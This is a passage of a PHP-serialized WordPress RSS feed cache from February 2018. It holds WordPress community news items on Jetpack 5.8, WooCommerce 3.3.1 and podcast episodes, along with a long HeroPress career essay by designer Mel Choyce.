podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards.</p>\n<p>In this episode, Brian and Brian continue their discussion on WordPress market opportunities with a focus on the upper-market and enterprise clients. They take a look at discovery projects, pitching WordPress against competing platforms, and considerations to make before pitching on these high-budget projects. There are plenty of positives and negatives when working on long-term projects that may have a dramatic impact on your company in many ways.</p>\n<p>In addition to these market opportunities, the boys also discuss recent news including iThemes acquisition by Liquid Web, a welcome change to the WordPress.org plugin directory, and an unfortunate and far-reaching bug that shipped with the 4.9.3 release last week.</p>\n<p></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://poststatus.com/liquid-web-acquired-ithemes/\">Liquid Web acquires iThemes</a></li>\n<li><a href=\"https://generatewp.com/new-policy-changes-wordpress-plugin-directory/\">Plugin directory notice changes</a></li>\n<li><a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">4.9.4 technical details</a></li>\n<li><a href=\"https://wpsessions.com/sessions/infusing-websites-brand-voice/\">Infusing Websites with Brand Voice</a><a href=\"https://wpsessions.com/teams\">WPS Team Training</a></li>\n</ul>\n<h3>Sponsor: WooCommerce</h3>\n<p><a href=\"https://woocommerce.com/\">WooCommerce</a> makes the most customizable eCommerce software on the planet, and it’s the most popular too. You can build just about anything with WooCommerce. <a href=\"https://woocommerce.com/\">Try it today</a>, and thanks to the team at WooCommerce being a Post Status partner</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Feb 2018 20:43:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WPTavern: Jetpack 5.8 Adds Lazy Loading for Images Module\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78112\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wptavern.com/jetpack-5-8-adds-lazy-loading-for-images-module\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2079:\"<p>Jetpack 5.8 <a href=\"https://jetpack.com/2018/02/06/jetpack-5-8-release/\">is available</a> for download and includes a handful of new features for Professional, Premium, and Personal plan users. In <a href=\"https://wptavern.com/jetpack-5-4-introduces-beta-version-of-new-search-module-powered-by-elasticsearch-for-professional-plan-users\">October of last year</a>, Jetpack 5.4 began beta testing a new <a href=\"https://jetpack.com/support/search/\">search module</a> based on <a href=\"https://www.elastic.co/\">Elasticsearch</a>. Jetpack 5.8 concludes the beta and the new search service is available to Professional plan customers.</p>\n<p>The new search module replaces the native search functionality in WordPress and Jetpack developers claim sites with a large amount of content, images, or products will see significant speed improvements and more relevant results. Developers can fine-tune the user experience by using custom queries and template tags. Users can sort results by categories, tags, month/year, post type, or any taxonomy.</p>\n<p>In addition to the Content Delivery Network, users have another method to optimize their sites with a new module named Lazy Load Images. When activated, Jetpack will display a page&#8217;s textual content first. When a user scrolls down the page, Jetpack will request and download images so they appear when that section of the page comes into view. Sites with a large amount of images will benefit most from having this module activated.</p>\n<p>Premium plan customers can now perform security scans on their sites at any time, upload an unlimited amount of videos, and access SEO tools that were once restricted to Business plan customers.</p>\n<p>Other notable improvements include:</p>\n<ul>\n<li>Support for timezone and site language settings</li>\n<li>Improved display of notices</li>\n<li>The GettyImages shortcode now uses the new format required by GettyImages</li>\n</ul>\n<p>To view all of the additions in this release, check out the <a href=\"https://wordpress.org/plugins/jetpack/#developers\">Jetpack 5.8 changelog</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Feb 2018 07:54:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Matt: The Laity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=47918\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://ma.tt/2018/02/the-laity/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:310:\"<blockquote class=\"wp-block-quote\">\n    <p>In the last analysis, every profession is a conspiracy against the laity.</p><cite>The Sir Patrick Cullen character in George Bernard Shaw’s play <a href=\"https://en.m.wikipedia.org/wiki/The_Doctor%27s_Dilemma_(play)\">The Doctor’s Dilemma</a></cite></blockquote>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 08 Feb 2018 21:48:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: WPWeekly Episode 304 – DesktopServer, Life, and Health with Marc Benzakein\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wptavern.com?p=78105&preview=true&preview_id=78105\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://wptavern.com/wpweekly-episode-304-desktopserver-life-and-health-with-marc-benzakein\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1931:\"<p>In this episode, <a href=\"http://jjj.me\">John James Jacoby</a> and I are joined by <a href=\"https://twitter.com/MarcBenzak\">Marc Benzakein</a>, Operations Manager for ServerPress, LLC. We discussed recent updates to DesktopServer and received a progress report on 4.0. Marc also shared some of the struggles the team encountered throughout 2017.</p>\n<p>We learned what&#8217;s new with <a href=\"https://wpsitesync.com/\">WP SiteSync</a> and what customers can look forward too later this year. We also talked about <a href=\"https://wordpress.tv/2017/12/08/marc-benzakein-fat-happy-and-fifty/\">Marc&#8217;s journey</a> of becoming a healthier person both physically and mentally. He recalls the issues he had to overcome and shares advice on how others can improve their health.</p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"https://wptavern.com/woocommerce-3-3-1-released-addresses-template-conflicts\">WooCommerce 3.3.1 Released, Addresses Template Conflicts</a><br />\n<a href=\"https://wptavern.com/wordpress-4-9-4-fixes-critical-auto-update-bug-in-4-9-3\">WordPress 4.9.4 Fixes Critical Auto Update Bug in 4.9.3</a><br />\n<a href=\"https://thehackernews.com/2018/02/wordpress-dos-exploit.html\">Unpatched DoS Flaw Could Help Anyone Take Down WordPress Websites</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 14th 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href=\"https://www.wptavern.com/feed/podcast\">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href=\"https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe\">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #304:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 08 Feb 2018 01:48:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"HeroPress: Becoming a Better Designer Through WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=2441\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:142:\"https://heropress.com/essays/becoming-better-designer-wordpress/#utm_source=rss&utm_medium=rss&utm_campaign=becoming-better-designer-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:19189:\"<img width=\"960\" height=\"480\" src=\"https://heropress.com/wp-content/uploads/2018/02/020718-1024x512.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: The connections I\'ve made, the skills I\'ve honed, and the mentorship I\'ve received have all contributed to making me the designer I am today.\" /><h3>The early years</h3>\n<p>I’ve always been an art kid. One of my first school memories is of drawing a clown and my art teacher being so enamored with it, she hung it up on her door for the whole year.</p>\n<p>The first time in my educational life I didn’t take an art class was my first year of college. By the end of the year, my fingers were itching and I was ready to scream — I had to take art. It didn’t take long for me to declare a Studio Art minor, which eventually became an Arts and Technology minor my senior year.</p>\n<p>I’ve also always been an internet kid. We received our first internet-connected Windows desktop in 1997. I’ll never forget the sound of dial-up as I signed into AOL, day after day for years to come. When my older brother started working for an ISP, we were able to go beyond just using AOL to connect, and I started spending more time exploring websites (rather than just AOL’s apps and chat rooms). I wanted to be like my older brother and learn how to make sites. I taught myself basic HTML by using View Source on existing sites — even back then, I was benefiting from the open web!</p>\n<p>Angelfire was my earliest web canvas. A couple of my friends eventually got into making websites, but I was always a little disdainful of them for using Homestead’s GUI builder, while I was making my sites from scratch. I had a blast making image-rich personal and fan sites with tables and HTML styles. Landing a copy of Photoshop Elements in high school only intensified my enjoyment of web design. I kept that passion up through college, when I found my first design gig.</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/old_web_site.jpg\"><img class=\"size-large wp-image-2442 aligncenter\" src=\"https://heropress.com/wp-content/uploads/2018/02/old_web_site-1024x479.jpg\" alt=\"Old Website, best viewed on AOL\" width=\"960\" height=\"449\" /></a></p>\n<h3>Could this be a career?</h3>\n<p>My first year of college got off to a bit of a rough financial start. By the time my financial aid was finalized and I was finally able to pick a work study job, my options were pretty limited. A dance professor needed an assistant to help her with some photocopying and organization tasks, along with helping her build out a print and web portfolio.</p>\n<p>I was honestly a terrible assistant, but I did a pretty good job with the design work. I continued to refine my skills working in the computers labs in subsequent years, and in my Junior year of college (ten years ago!) I landed an internship at a local web design agency. That internship turned into a part-time job, which opened up doors to more local web design opportunities, and soon I was graduating college and pretty well situated into the start of my career.</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/early-site.jpg\"><img class=\"aligncenter size-large wp-image-2443\" src=\"https://heropress.com/wp-content/uploads/2018/02/early-site-1024x666.jpg\" alt=\"Skeumorphic website design that looks like a notepad with pen ink all over it.\" width=\"960\" height=\"624\" /></a></p>\n<p>It was at these agencies that I started learning how to build WordPress websites. I’d used WordPress a couple times in college and felt comfortable with it, but now I was focusing a lot more on building my skills as a designer and front-end developer. My girlfriend (who was working at the same web agency) and I managed to convince our boss to start letting us create totally custom websites, rather than customizing existing themes, and that opened up a whole new world of design opportunities.</p>\n<h3>My first WordCamp</h3>\n<p>It was around then that my girlfriend, who attended WordCamp NYC the previous year, noticed the conference organizers were <a href=\"https://2010.nyc.wordcamp.org/volunteer-designer-needed/\">looking for some volunteer designers</a> to help create some graphics. She passed along the information, and I got in touch.</p>\n<p>I collaborated with a few other designers to create the WordCamp branding, which was used across the website, t-shirt, signage, and stickers:</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/wcnyc.png\"><img class=\"aligncenter size-full wp-image-2444\" src=\"https://heropress.com/wp-content/uploads/2018/02/wcnyc.png\" alt=\"WCNYC Banner\" width=\"429\" height=\"286\" /></a></p>\n<p>It was amazing to see it everywhere at the WordCamp. It felt really special. Though I didn’t get “props” for this, I still consider it my first contribution to WordPress.</p>\n<p>WordCamp NYC was a ton of fun. I met interesting people, learned a lot about WordPress, and started to get a feel for the community. I left with a desire to get more involved. I browsed through WordPress.org, stumbling upon the “Make” section. I was stoked to see that there was a design group. I couldn’t write much code beyond CSS, but I could contribute my design skills. I joined a couple of the core channels on IRC, including the design channel (#wordpress-ui), and observed for while. I watched how the other designers in the project communicated, what they worked on, where they presented their work, etc. By observing before participating, I could learn the social queues and mores of the community. I didn’t want to embarass myself — I wanted to do things the established way based on community standards.</p>\n<p>What I found to be one of the most difficult parts of contributing was adapting to the technology used to build WordPress. I had to learn how to use command line and SVN. Getting set up in SVN and terminal was probably the biggest thing that stopped me from contributing code during my early years.</p>\n<p>But most of all, it came down to conquering fear. Fear that my design skills would be unwanted and unwelcome; fear that other contributors would look down on me or ignore me, or that they’d find me irritating; fear that I just wasn’t good enough to contribute. Some of this fear persists today, albeit greatly reduced.</p>\n<p>There’s a point at which I managed to conquer a little bit of that fear, stop observing, and really start to pitch in. Slowly, I started chiming in and volunteering for design tasks in IRC and the Make Design p2. I ended up doing a lot of small projects on the community side (rather than the core side) at first — some new landing pages and redesigns of sections on WordPress.org, graphics, and design for my own local meetups. I started feeling more and more confident with my contributions.</p>\n<h3>Core Props</h3>\n<p>By this point, I had done some wireframes and mockups for the core WordPress software — I’d even spoken at a WordCamp! — but I hadn’t actually gotten any code committed. Which meant, at this point in time, I didn’t have any “core props.” I was still really intimidated by Trac and SVN. I was a designer, and most design conversations happened in explicitly design space. But I really wanted to get some code committed into core, so I needed to find a CSS bug I felt qualified to fix.</p>\n<p>At WordCamp Philly in 2012, I finally got a chance. Sunday was devoted to contributing to WordPress. There were experienced core contributors present who could teach people how to make a patch, how to submit a ticket, and suggest tickets for people to work on.</p>\n<p>Aaron Jorbin, a core contributor and fellow speaker (and, now a friend), found a CSS issue I could work on: bringing the alternate “blue” color scheme into sync with the default “grey” scheme. He helped me get set up, helped me through saving my changes as a patch, and then helped me submit that patch to Trac. Andy Nacin, another core contributor (and future friend!) subsequently committed that patch, and I received my first core props.</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/first-props2.png\"><img class=\"aligncenter size-large wp-image-2445\" src=\"https://heropress.com/wp-content/uploads/2018/02/first-props2-1024x370.png\" alt=\"Screenshot of ticket giving Mel props\" width=\"960\" height=\"347\" /></a></p>\n<p>After creating my first patch, contributing became easier and easier. My confidence grew, and I spent more time participating in IRC, p2s, and Trac discussions. Then, in January of 2013, major design changes started coming to WordPress.</p>\n<h3>My WordPress apprenticeship</h3>\n<p>It started with icons.</p>\n<p>Ben Dunkle, WordPress’s official icon designer, proposed some shiny new icons for the WordPress dashboard. They were “flat” — one color, not a ton of details. The icons were awesome, but they didn’t really fit stylistically with the rest of the admin. The flat styles clashed with WordPress’ heavy use of gradients.</p>\n<p>So, I helped imagine what the admin could look like totally flat. We tried out a couple ideas, got them committed, and refined in code. The stark styles looked really fresh after years of gradients!</p>\n<p>Unfortunately, flattening the admin unearthed a whole lot of other issues. There wasn’t enough time to flesh out the new design before the next version of WordPress launched, so the flat styles got reverted and tabled for another time.</p>\n<p>Pretty soon after, I received an email via my site’s contact form:</p>\n<p><em><strong>Name</strong>: Matt</em><br />\n<em><strong> Comment</strong>: Add me on Skype when you get a chance.</em></p>\n<p>I think my heart stopped when I realized I had been emailed by the co-founder of WordPress, Matt Mullenweg. Matt invited me to come join a group that would take a broader look at redesigning the admin (codenamed “MP6”). It meant a lot for someone as important as Matt to recognize my skills. I spent a lot of my early years as a designer plagued with self-doubt, and suddenly I had someone pointing at me, going “I believe in you!”</p>\n<p>I leapt at the chance.</p>\n<p>Our group worked together on Skype. We quickly scoped the goal of MP6 to only update CSS and a little bit of JS. I helped Ben make some new vector icons, gave feedback and critiqued design proposals, and made some design proposals of my own. It was an intimate group where we all felt free to safely share and critique each other’s work. The mentorship I received from more experienced WordPress designers was invaluable to my growth. Working with these veterans of WordPress really helped me to grow into my fledgling wings.</p>\n<p><a href=\"https://make.wordpress.org/core/2013/10/23/mp6-3-8-proposal/\">WordPress 3.8 shipped with the updated admin interface</a>, and I knew it was time to take my design career to a new level.</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/4-8-credits-smaller.jpg\"><img class=\"aligncenter size-large wp-image-2446\" src=\"https://heropress.com/wp-content/uploads/2018/02/4-8-credits-smaller-1024x895.jpg\" alt=\"WordPress 4.8 Credits\" width=\"960\" height=\"839\" /></a></p>\n<h3>Leaving the nest</h3>\n<p>I’d had my eye on Automattic, the makers of WordPress.com, the Jetpack plugin, and many other products, for most of my time contributing to WordPress. A couple of the designers I worked with on MP6 were Automattic designers, and it was an absolute joy to collaborate with them. At this point I’d spent so much of my career as either a lone designer, or in a competitive environment, that having a supportive, collaborative group of people helping me improve my work was a revelation.</p>\n<p>I desperately wanted to work at Automattic.</p>\n<p>While MP6 was in the works, I participated in a three month long design apprenticeship at a local agency. I worked alongside experienced mentors and fellow apprentices to hone my interface and user experience design skills. It was challenging and thrilling and totally complemented the mentorship I was receiving from WordPress folks. Plus, working in a positive environment reinforced my desire to work somewhere similar.</p>\n<p>After the apprenticeship, I finally felt like I had the skills and confidence to apply. I spent a lot of time writing my cover letter, and redesigning my portfolio to use in-depth case studies on a small number of recent projects. I finally sent off my application and crossed my fingers.</p>\n<p>A couple weeks later, I received a reply back asking to schedule an interview. I was terrified, but luckily, Automattic conducts interviews via text, so I was able to hide my fear behind my keyboard and hopefully try to project confidence. (Aside: I also show all my emotions on my face, so online communication is the best.)</p>\n<p>It must have worked, because I was moved on to the next phase of the application, doing a self-contained trial project, which was a whole ton of fun. I was able to put my recently refined research, interviewing, and user testing skills to use. I loved being given a real challenge to tackle. My trial went well, so I was moved along to the final interview with Matt Mullenweg. We spent a couple hours chatting on Skype, and at the end of our conversation I was given an offer. Welcome to Automattic!</p>\n<p>After working so hard on my apprenticeship, and on MP6, joining Automattic felt incredibly validating. The work I put in, the mentorship I received, all of the collaboration, led to this moment. I felt like I had graduated from apprentice and was now embarking on my adventure as a design journeyman. And boy, has it been an adventure!</p>\n<h3><a href=\"https://heropress.com/wp-content/uploads/2018/02/automattic-2-smaller.jpg\"><img class=\"aligncenter size-large wp-image-2447\" src=\"https://heropress.com/wp-content/uploads/2018/02/automattic-2-smaller-1024x678.jpg\" alt=\"Automattic Group Photo\" width=\"960\" height=\"636\" /></a></h3>\n<h3>Design leadership</h3>\n<p>The past four and a half years at Automattic have been fantastic. I have the best coworkers anyone can ask for. I’ve worked with some incredibly talented and empathetic designers, whose guidance and feedback constantly encourage me to improve my skills.</p>\n<p>I’ve continued to contribute to WordPress, slowly gaining more responsibility in the project the longer I stuck around. That’s the secret to becoming an open source leader, I discovered — <strong>decisions are made by the people who show up</strong>.</p>\n<p>In 2016, I was asked to by the Release Design Lead for <a href=\"https://wordpress.org/news/2016/04/coleman/\">WordPress 4.5 “Coleman.”</a> I worked alongside the other release leads to make design-related decisions that impacted the release. This was the first release we experimented with having a Design Lead. I felt like design finally had a seat at the table.</p>\n<p>This continued to be the case last year, when Matt Mullenweg announced core focuses for the year: Editing, Customization, and the API. Both Editing and Customization had designers co-leading their focus. I was named the Customization co-lead. I’d been working on customization and site building on WordPress.com for over a year, so I had relevant experience.</p>\n<p>I worked with my developer co-lead, Weston Ruter, on low-hanging fruit, most of which we released in WordPress 4.8. The release was smaller, focused more on improvements than new features. We made a lot of updates to widgets, which had been long neglected.</p>\n<p>After that, we turned our sights to some more ambitious projects: drafting and scheduling changes in the Customizer, improvements to code editing in the WordPress admin, even more widget updates, and upgrades around the flow of changing themes and building menus for your site. We took a design-first approach to building out these new features, and I think it really shows in the work that we produced during the 4.9 release cycle, which Weston and I co-led.</p>\n<p><a href=\"https://wordpress.org/news/2017/11/tipton/\">WordPress 4.9 “Tipton”</a> launched in November. Since then, I’ve pivoted to work on <a href=\"https://wordpress.org/gutenberg/\">Gutenberg</a>, the new editing experience for WordPress which should be released in 5.0. Once the editing experience wraps up, we’re going to start looking at how we can extend Gutenberg to cover site building and customization. It’s a big, audacious goal that I hope to pursue with caution, humility, and a spirit of adventure.</p>\n<p>I owe WordPress a great deal. The connections I’ve made, the skills I’ve honed, and the mentorship I’ve received have all contributed to making me the designer I am today. I hope to give back for years to come!</p>\n<p><a href=\"https://heropress.com/wp-content/uploads/2018/02/community-summit-smaller.jpg\"><img class=\"aligncenter size-full wp-image-2448\" src=\"https://heropress.com/wp-content/uploads/2018/02/community-summit-smaller.jpg\" alt=\"Community Summit Group Photo\" width=\"960\" height=\"556\" /></a></p>\n<div class=\"rtsocial-container rtsocial-container-align-right rtsocial-horizontal\"><div class=\"rtsocial-twitter-horizontal\"><div class=\"rtsocial-twitter-horizontal-button\"><a title=\"Tweet: Becoming a Better Designer Through WordPress\" class=\"rtsocial-twitter-button\" href=\"https://twitter.com/share?text=Becoming%20a%20Better%20Designer%20Through%20WordPress&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbecoming-better-designer-wordpress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-fb-horizontal fb-light\"><div class=\"rtsocial-fb-horizontal-button\"><a title=\"Like: Becoming a Better Designer Through WordPress\" class=\"rtsocial-fb-button rtsocial-fb-like-light\" href=\"https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fbecoming-better-designer-wordpress%2F\" rel=\"nofollow\" target=\"_blank\"></a></div></div><div class=\"rtsocial-linkedin-horizontal\"><div class=\"rtsocial-linkedin-horizontal-button\"><a class=\"rtsocial-linkedin-button\" href=\"https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fbecoming-better-designer-wordpress%2F&title=Becoming+a+Better+Designer+Through+WordPress\" rel=\"nofollow\" target=\"_blank\" title=\"Share: Becoming a Better Designer Through WordPress\"></a></div></div><div class=\"rtsocial-pinterest-horizontal\"><div class=\"rtsocial-pinterest-horizontal-button\"><a class=\"rtsocial-pinterest-button\" href=\"https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/becoming-better-designer-wordpress/&media=https://heropress.com/wp-content/uploads/2018/02/020718-150x150.jpg&description=Becoming a Better Designer Through WordPress\" rel=\"nofollow\" target=\"_blank\" title=\"Pin: Becoming a Better Designer Through WordPress\"></a></div></div><a rel=\"nofollow\" class=\"perma-link\" href=\"https://heropress.com/essays/becoming-better-designer-wordpress/\" title=\"Becoming a Better Designer Through WordPress\"></a></div><p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/becoming-better-designer-wordpress/\">Becoming a Better Designer Through WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Feb 2018 12:00:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Mel Choyce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: WooCommerce 3.3.1 Released, Addresses Template Conflicts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78089\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wptavern.com/woocommerce-3-3-1-released-addresses-template-conflicts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1330:\"<p>WooCommerce 3.3.1 <a href=\"https://woocommerce.wordpress.com/2018/02/06/woocommerce-3-3-1-fix-release-notes/\">is available</a> and fixes template conflicts discovered in a handful of WordPress themes that forced the team to <a href=\"https://wptavern.com/woocommerce-3-3-removed-from-plugin-directory-due-to-theme-conflicts\">revert WooCommerce 3.3</a>. The team reviewed handful of the most common themes running WooCommerce and 